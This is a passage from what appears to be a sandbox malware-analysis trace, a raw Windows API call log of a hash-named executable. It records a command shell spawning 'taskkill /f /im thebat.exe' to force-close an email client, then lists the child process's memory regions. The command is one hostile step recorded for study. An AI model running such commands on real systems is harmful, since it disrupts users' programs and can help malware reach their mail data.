LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0222.557] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0222.558] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0222.558] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0222.559] GetProcessHeap () returned 0x6b0000 [0222.559] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20c) returned 0x6baa50 [0222.559] GetConsoleTitleW (in: lpConsoleTitle=0x6baa50, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0222.560] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0222.560] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0222.560] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0222.560] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0222.560] GetProcessHeap () returned 0x6b0000 [0222.561] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x400a) returned 0x6bbc50 [0222.561] GetProcessHeap () returned 0x6b0000 [0222.561] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6bbc50) returned 1 [0222.562] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0222.562] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0222.562] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0222.562] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0222.562] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0222.562] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0222.562] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0222.562] GetProcessHeap () returned 0x6b0000 [0222.562] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x58) returned 0x6bac68 [0222.562] GetProcessHeap () returned 0x6b0000 [0222.562] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1a) returned 0x6b0578 [0222.562] GetProcessHeap () returned 0x6b0000 [0222.562] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x30) returned 0x6bacc8 [0222.563] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0222.564] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0222.564] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0222.564] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0222.564] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0222.564] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0222.564] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0222.564] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0222.564] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0222.564] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0222.565] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0222.565] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0222.565] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0222.565] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0222.565] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0222.565] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0222.565] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0222.565] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0222.565] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0222.565] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0222.565] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0222.565] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0222.565] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0222.565] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0222.565] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0222.565] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0222.565] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0222.565] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0222.565] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0222.565] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0222.565] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0222.565] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0222.565] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0222.565] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0222.565] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0222.565] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0222.565] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0222.565] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0222.565] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0222.565] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0222.565] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0222.566] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0222.566] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0222.566] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0222.566] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0222.566] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0222.566] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0222.566] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0222.566] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0222.566] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0222.566] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0222.566] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0222.566] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0222.566] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0222.566] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0222.566] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0222.566] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0222.566] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0222.566] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0222.566] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0222.566] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0222.566] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0222.566] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0222.566] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0222.566] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0222.566] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0222.566] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0222.566] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0222.566] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0222.566] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0222.567] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0222.567] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0222.567] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0222.567] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0222.567] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0222.567] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0222.567] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0222.567] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0222.567] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0222.567] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0222.567] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0222.567] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0222.567] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0222.567] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0222.567] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0222.567] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0222.567] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0222.567] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0222.568] GetProcessHeap () returned 0x6b0000 [0222.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x210) returned 0x6bad00 [0222.568] GetProcessHeap () returned 0x6b0000 [0222.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x42) returned 0x6baf18 [0222.568] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0222.568] GetProcessHeap () returned 0x6b0000 [0222.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x418) returned 0x6b05c8 [0222.568] SetErrorMode (uMode=0x0) returned 0x8003 [0222.568] SetErrorMode (uMode=0x1) returned 0x0 [0222.568] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6b05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0222.568] SetErrorMode (uMode=0x8003) returned 0x1 [0222.568] GetProcessHeap () returned 0x6b0000 [0222.568] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b05c8, Size=0x56) returned 0x6b05c8 [0222.568] GetProcessHeap () returned 0x6b0000 [0222.568] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b05c8) returned 0x56 [0222.568] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0222.569] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0222.569] GetProcessHeap () returned 0x6b0000 [0222.569] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x110) returned 0x6baf68 [0222.569] GetProcessHeap () returned 0x6b0000 [0222.569] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x218) returned 0x6b0628 [0222.573] GetProcessHeap () returned 0x6b0000 [0222.573] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b0628, Size=0x112) returned 0x6b0628 [0222.574] GetProcessHeap () returned 0x6b0000 [0222.574] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b0628) returned 0x112 [0222.574] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0222.574] GetProcessHeap () returned 0x6b0000 [0222.574] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xe0) returned 0x6bb080 [0222.575] GetProcessHeap () returned 0x6b0000 [0222.575] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6bb080, Size=0x76) returned 0x6bb080 [0222.575] GetProcessHeap () returned 0x6b0000 [0222.575] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6bb080) returned 0x76 [0222.575] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.576] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0222.576] GetLastError () returned 0x2 [0222.576] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.576] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x6bb100 [0222.576] GetProcessHeap () returned 0x6b0000 [0222.576] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6b76e8 [0222.576] FindClose (in: hFindFile=0x6bb100 | out: hFindFile=0x6bb100) returned 1 [0222.576] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0222.577] GetLastError () returned 0x2 [0222.577] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x6bb100 [0222.577] GetProcessHeap () returned 0x6b0000 [0222.577] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b76e8, Size=0x4) returned 0x6bb140 [0222.577] FindClose (in: hFindFile=0x6bb100 | out: hFindFile=0x6bb100) returned 1 [0222.577] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0222.577] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0222.577] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0222.577] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0222.577] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0222.578] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144)) [0222.578] GetProcessHeap () returned 0x6b0000 [0222.578] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x18) returned 0x6b76a8 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0222.579] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0222.579] GetProcessHeap () returned 0x6b0000 [0222.579] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b76a8) returned 1 [0222.579] GetProcessHeap () returned 0x6b0000 [0222.579] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa) returned 0x6bb100 [0222.579] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0222.582] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im thebat.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im thebat.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im thebat.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x338, dwThreadId=0x1304)) returned 1 [0222.627] CloseHandle (hObject=0x98) returned 1 [0222.627] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0222.627] GetProcessHeap () returned 0x6b0000 [0222.628] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b9d50) returned 1 [0222.628] GetEnvironmentStringsW () returned 0x6b9d50* [0222.628] GetProcessHeap () returned 0x6b0000 [0222.628] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa76) returned 0x6bbc50 [0222.628] FreeEnvironmentStringsA (penv="=") returned 1 [0222.628] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0223.627] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0223.628] CloseHandle (hObject=0x9c) returned 1 [0223.628] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0223.628] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0223.628] GetProcessHeap () returned 0x6b0000 [0223.629] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6bbc50) returned 1 [0223.629] GetEnvironmentStringsW () returned 0x6bb150* [0223.629] GetProcessHeap () returned 0x6b0000 [0223.629] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa9c) returned 0x6bbbf8 [0223.629] FreeEnvironmentStringsA (penv="=") returned 1 [0223.629] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0223.629] GetProcessHeap () returned 0x6b0000 [0223.630] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6bbbf8) returned 1 [0223.630] GetEnvironmentStringsW () returned 0x6bb150* [0223.630] GetProcessHeap () returned 0x6b0000 [0223.630] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa9c) returned 0x6bbbf8 [0223.630] FreeEnvironmentStringsA (penv="=") returned 1 [0223.630] GetProcessHeap () returned 0x6b0000 [0223.630] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6bb100) returned 1 [0223.630] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0223.630] _get_osfhandle (_FileHandle=1) returned 0x140 [0223.630] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0223.630] _get_osfhandle (_FileHandle=1) returned 0x140 [0223.630] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0223.630] _get_osfhandle (_FileHandle=0) returned 0x13c [0223.630] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0223.630] GetConsoleOutputCP () returned 0x1b5 [0223.631] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0223.631] SetThreadUILanguage (LangId=0x0) returned 0x409 [0223.631] exit (_Code=128) Thread: id = 383 os_tid = 0x520 Process: id = "76" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x5de08000" os_pid = "0x338" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "75" os_parent_pid = "0xdf0" cmd_line = "taskkill /f /im thebat.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5415 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5416 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5417 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5418 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 5419 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 5420 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 5421 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 5422 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 5423 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 5424 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5425 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 5426 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5427 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5428 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5429 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5430 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5431 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5432 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5433 start_va = 0x4160000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" 